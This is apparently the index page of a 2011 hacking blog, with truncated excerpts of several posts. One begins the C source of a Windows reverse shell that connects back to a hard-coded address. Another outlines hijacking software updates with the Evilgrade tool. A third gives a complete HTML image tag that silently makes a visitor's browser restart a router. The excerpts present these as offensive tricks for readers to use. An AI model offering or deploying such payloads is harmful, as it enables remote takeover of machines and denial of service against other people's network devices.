Pages

Monday, October 31, 2011

Reverse shell through DLL Injection using undocumented API function

AJVrs.c Reverse shell in win32 (c) by Andreas Venieris (aka thiseas) 2010 Compile with VS 2008 from command line with cl: C:> cl AJVrs.c ****************************************************** *********/ #include <winsock2.h> #include <stdio.h> #pragma comment(lib, "Ws2_32.lib") // Inform the linker that // the Ws2_32.lib fle is needed. #defne DEFAULT_PORT 1234 #defne DEFAULT_IP "192.168.1.70" WSADATA wsaData; SOCKET Winsocket; STARTUPINFO theProcess; PROCESS_INFORMATION info_proc; struct sockaddr_in Winsocket_Structure; int main(int...

Hijacking Software updates with Evilgrade

Now a days software developers do not spend much time on updates and secure delivery mechanisms. That’s why standard processes for updating applications make many users vulnerable The process is as follows: • Application by initiates update process. • Application will connect to the DNS server host for example update.app1.com • DNS server replies with server IP (for example 200.1.1.1). • Application downloads a special file with information about the update, for example lastupdate.xml from update.app1.com • Application...

to shut down router by using HTML code

its a very simple trick that by using html code we can shut down routers ... code is here <img widtgh=0 height=0 src=”http://192.168.1.3/FormSub.cgi2&restart=0&RestartStart=1&Restart=Restart”> </img> Enjoy...

Monday, October 3, 2011

Subscribe to Hacker by Em...

Enter your email address:Delivered by FeedBur...

Vulnerable Facebook Applications

Facebook has always been under the scanner because of its privacy issues. Since its release in 2004, it has been target several times because of its security measures. Over the course of time Facebook did learn from its mistakes and improved its security measures of how people share information on the platform. But an area where they still don’t have much control is the applications that are built using the platform. Here is a statement from...

Related Posts Plugin for WordPress, Blogger...